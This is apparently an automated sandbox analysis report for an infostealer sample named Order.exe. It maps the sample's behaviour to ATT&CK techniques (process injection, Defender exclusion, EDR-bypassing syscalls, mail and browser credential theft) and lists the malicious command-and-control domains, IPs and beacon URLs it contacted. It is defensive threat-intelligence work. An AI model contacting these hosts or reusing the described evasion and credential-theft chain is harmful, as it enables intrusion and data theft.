Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1540817 | Sample: Order.exe | Startdate: 24/10/2024 | Architecture: WINDOWS | Score: 100

Graph edges (node id -> node id: node label):
2 -> 47: www.vasehub.xyz
2 -> 49: www.moritynomxd.xyz
2 -> 51: 23 other IPs or domains
2 -> 55: Suricata IDS alerts for network traffic
2 -> 57: Malicious sample detected (through community Yara rule)
2 -> 59: Multi AV Scanner detection for submitted file
2 -> 63: 9 other signatures
2 -> 10: Order.exe 4 (started)
49 -> 61: Performs DNS queries to domains with low reputation
10 -> 39: C:\Users\user\AppData\Local\...\Order.exe.log, ASCII (dropped)
10 -> 67: Adds a directory exclusion to Windows Defender
10 -> 69: Injects a PE file into a foreign processes
10 -> 14: Order.exe (started)
10 -> 17: powershell.exe 23 (started)
10 -> 19: conhost.exe (started)
10 -> 21: Order.exe (started)
14 -> 71: Maps a DLL or memory area into another process
14 -> 23: mkvfHfXifKJWp.exe (injected)
17 -> 73: Loading BitLocker PowerShell Module
17 -> 26: WmiPrvSE.exe (started)
17 -> 28: conhost.exe (started)
23 -> 65: Found direct / indirect Syscall (likely to bypass EDR)
23 -> 30: mshta.exe 13 (started)
30 -> 75: Tries to steal Mail credentials (via file / registry access)
30 -> 77: Tries to harvest and steal browser information (history, passwords, etc)
30 -> 79: Modifies the context of a thread in another process (thread injection)
30 -> 81: 3 other signatures
30 -> 33: mkvfHfXifKJWp.exe (injected)
30 -> 37: firefox.exe (started)
33 -> 41: www.coffee-and-blends.info 217.160.0.231, 50024, 50025, 50026 ONEANDONE-ASBrauerstrasse48DE Germany
33 -> 43: www.vasehub.xyz 162.213.249.216, 49956, 49967, 49978 NAMECHEAP-NETUS United States
33 -> 45: 8 other IPs or domains
33 -> 53: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
Order.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Order.exe | 49% | Virustotal |
Order.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
www.vasehub.xyz | 1% | Virustotal |
softillery.info | 4% | Virustotal |
tukaari.shop | 0% | Virustotal |
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.vasehub.xyz | 162.213.249.216 | true | true | | unknown
softillery.info | 3.33.130.190 | true | true | | unknown
tukaari.shop | 3.33.130.190 | true | true | | unknown
www.moritynomxd.xyz | 172.81.61.224 | true | true | | unknown
40wxd.top | 206.119.82.134 | true | true | | unknown
www.specialgift.asia.s.strikinglydns.com | 35.156.117.131 | true | true | | unknown
www.luxe.guru | 52.20.84.62 | true | true | | unknown
dns.ladipage.com | 54.179.173.60 | true | true | | unknown
digitalbloom.info | 3.33.130.190 | true | true | | unknown
www.coffee-and-blends.info | 217.160.0.231 | true | true | | unknown
filelabel.info | 3.33.130.190 | true | true | | unknown
www.nad5.shop | 156.226.22.233 | true | true | | unknown
ghs.googlehosted.com | 142.250.186.83 | true | false | | unknown
multileveltravel.world | 3.33.130.190 | true | true | | unknown
www.tukaari.shop | unknown | unknown | true | | unknown
www.tmstore.click | unknown | unknown | true | | unknown
www.40wxd.top | unknown | unknown | true | | unknown
www.gemtastic.shop | unknown | unknown | true | | unknown
www.softillery.info | unknown | unknown | true | | unknown
www.longfilsalphonse.net | unknown | unknown | true | | unknown
www.multileveltravel.world | unknown | unknown | true | | unknown
www.digitalbloom.info | unknown | unknown | true | | unknown
www.filelabel.info | unknown | unknown | true | | unknown
www.specialgift.asia | unknown | unknown | true | | unknown
www.amitayush.digital | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.coffee-and-blends.info/jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY= | true | | unknown
http://www.filelabel.info/lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5 | true | | unknown
http://www.multileveltravel.world/ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5 | true | | unknown
http://www.nad5.shop/moqb/ | true | | unknown
http://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5 | false | | unknown
http://www.softillery.info/xia9/ | true | | unknown
http://www.digitalbloom.info/frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5 | true | | unknown
http://www.specialgift.asia/s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5 | true | | unknown
http://www.tukaari.shop/h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5 | true | | unknown
http://www.tmstore.click/qmcg/ | true | | unknown
http://www.amitayush.digital/5ab9/ | false | | unknown
http://www.vasehub.xyz/rhgo/ | true | | unknown
http://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5 | true | | unknown
http://www.moritynomxd.xyz/d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo= | true | | unknown
http://www.vasehub.xyz/rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 | true | | unknown
http://www.digitalbloom.info/frw6/ | true | | unknown
http://www.luxe.guru/esft/ | true | | unknown
http://www.softillery.info/xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5 | true | | unknown
http://www.40wxd.top/xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5 | true | | unknown
http://www.moritynomxd.xyz/d5je/ | true | | unknown
http://www.tukaari.shop/h8b0/ | true | | unknown
http://www.multileveltravel.world/ou1g/ | true | | unknown
http://www.filelabel.info/lclg/ | true | | unknown
http://www.nad5.shop/moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q= | true | | unknown
http://www.coffee-and-blends.info/jp2s/ | true | | unknown
http://www.40wxd.top/xqel/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersG | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/DataSet1.xsd | Order.exe | false | | unknown
http://www.luxe.guru/ | mshta.exe, 00000009.00000002.4144994745.000000000546A000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003B5A000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.tiro.com | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U | mshta.exe, 00000009.00000002.4144994745.000000000578E000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003E7E000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tukaari.shop | mkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                                                                          http://www.galapagosdesign.com/DPleaseOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.fonts.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.sandoll.co.krOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.urwpp.deDPleaseOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.zhongyicts.com.cnOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder.exe, 00000000.00000002.1737474491.0000000002A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.sakkal.comOrder.exe, 00000000.00000002.1755072561.0000000005324000.00000004.00000020.00020000.00000000.sdmp, Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://www.fontbureau.comOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirectfirefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.ecosia.org/newtab/mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.carterandcone.comlOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FPmshta.exe, 00000009.00000002.4144994745.0000000004E22000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003512000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.founder.com.cn/cnOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlOrder.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.jiyu-kobo.co.jp/Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.fontbureau.com/designers8Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  217.160.0.231
                                                                                                                                  www.coffee-and-blends.infoGermany
                                                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                  52.20.84.62
                                                                                                                                  www.luxe.guruUnited States
                                                                                                                                  14618AMAZON-AESUStrue
                                                                                                                                  35.156.117.131
                                                                                                                                  www.specialgift.asia.s.strikinglydns.comUnited States
                                                                                                                                  16509AMAZON-02UStrue
                                                                                                                                  156.226.22.233
                                                                                                                                  www.nad5.shopSeychelles
                                                                                                                                  132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                                                  206.119.82.134
                                                                                                                                  40wxd.topUnited States
                                                                                                                                  174COGENT-174UStrue
                                                                                                                                  54.179.173.60
                                                                                                                                  dns.ladipage.comUnited States
                                                                                                                                  16509AMAZON-02UStrue
                                                                                                                                  142.250.186.83
                                                                                                                                  ghs.googlehosted.comUnited States
                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                  162.213.249.216
                                                                                                                                  www.vasehub.xyzUnited States
                                                                                                                                  22612NAMECHEAP-NETUStrue
                                                                                                                                  3.33.130.190
                                                                                                                                  softillery.infoUnited States
                                                                                                                                  8987AMAZONEXPANSIONGBtrue
                                                                                                                                  172.81.61.224
                                                                                                                                  www.moritynomxd.xyzUnited States
                                                                                                                                  22552ESITEDUStrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540817
Start date and time: 2024-10-24 08:00:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Order.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@14/7@16/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 96
• Number of non-executed functions: 289
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time      Type             Description
02:01:03  API Interceptor  2x Sleep call for process: Order.exe modified
02:01:04  API Interceptor  18x Sleep call for process: powershell.exe modified
02:01:57  API Interceptor  12176771x Sleep call for process: mshta.exe modified
                                                                                                                                  invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jinlan.online/e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.specialgift.asia.s.strikinglydns.com | jeez.exe | malicious | FormBook | 35.156.117.131
www.moritynomxd.xyz | POPO00003964.exe | malicious | FormBook | 172.81.61.224
 | YSjOEAta07.exe | malicious | FormBook | 172.81.61.224
 | Arrival notice.exe | malicious | FormBook | 172.81.61.224
 | List of Items0001.doc.exe | malicious | FormBook, GuLoader | 172.81.61.224
 | PO2024033194.exe | malicious | FormBook | 172.81.61.224
 | ncOLm62YLB.exe | malicious | FormBook | 172.81.61.224
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | la.bot.powerpc.elf | malicious | Unknown | 3.208.56.119
 | la.bot.m68k.elf | malicious | Unknown | 35.172.39.248
 | na.elf | malicious | Unknown | 3.93.94.203
 | https://linkednnn.weebly.com/ | malicious | Unknown | 3.233.158.25
 | la.bot.mipsel.elf | malicious | Unknown | 3.217.150.18
 | https://freshremovedigital.com/ | malicious | Unknown | 18.232.36.66
 | https://forcallblitz.com/ | malicious | Unknown | 34.225.61.248
 | https://www.paypal.com/invoice/payerView/details/INV2-N92X-T2Z2-AHQ9-TKQH?locale.x=en_US&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000238&utm_unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&ppid=RT000238&cnac=US&rsta=en_US%28en-US%29&unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&calc=f264059569334&unp_tpcid=invoice-buyer-notification&page=main%3Aemail%3ART000238&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.287.1&tenant_name=&xt=145585%2C134644%2C150948%2C104038&link_ref=details_inv2-n92x-t2z2-ahq9-tkqh | malicious | Unknown | 54.235.101.7
 | https://printwithwave.co:443,* | malicious | Unknown | 54.225.120.177
 | mips.elf | malicious | Unknown | 54.18.237.108
ONEANDONE-ASBrauerstrasse48DE | Adeleidae.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.102
 | https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20= | malicious | Unknown | 74.208.140.2
 | PO NAHK22012FA000000.docx | malicious | Unknown | 62.151.179.85
 | LlbpXphTu9.exe | malicious | Unknown | 217.160.0.132
 | derstand.doc | malicious | Unknown | 62.151.179.85
 | feelnicewithgreatthingsgreatdayscomingforgreat.hta | malicious | Cobalt Strike | 62.151.179.85
 | la.bot.mips.elf | malicious | Unknown | 212.227.7.107
 | Sprawl.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.102
 | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
 | Invoice.exe | malicious | FormBook, PureLog Stealer | 217.160.0.158
AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | 8mmZ7Bkoj1.exe | malicious | FormBook | 156.226.22.233
 | notificacion_de_credito__PDF__.exe | malicious | FormBook | 156.226.22.233
 | RECIEPT.PDF.exe | malicious | FormBook | 156.226.22.233
 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 156.226.22.233
 | September Order.exe | malicious | FormBook | 156.226.22.233
 | Tomcat.bin.exe | malicious | Unknown | 216.250.106.146
 | b4cbf3ffbd8e152116e72487c3b16f1d.exe | malicious | Unknown | 216.250.106.146
 | Tomcat.bin.exe | malicious | Unknown | 216.250.106.146
 | b4cbf3ffbd8e152116e72487c3b16f1d.exe | malicious | Unknown | 216.250.106.146
 | jURI57sJ9G.exe | malicious | GhostRat, Nitol | 154.211.23.99
AMAZON-02US | YIztve8dU8.elf | malicious | Mirai | 34.249.145.219
 | la.bot.arm5.elf | malicious | Unknown | 18.247.128.153
 | la.bot.powerpc.elf | malicious | Unknown | 44.226.164.168
 | la.bot.sh4.elf | malicious | Unknown | 13.117.90.175
 | la.bot.arm.elf | malicious | Unknown | 18.221.130.130
 | la.bot.m68k.elf | malicious | Unknown | 35.73.66.55
 | na.elf | malicious | Unknown | 35.181.167.123
 | la.bot.mips.elf | malicious | Unknown | 3.202.44.93
 | Bill Of Lading_MEDUVB935991.pdf.exe | malicious | FormBook | 13.248.169.48
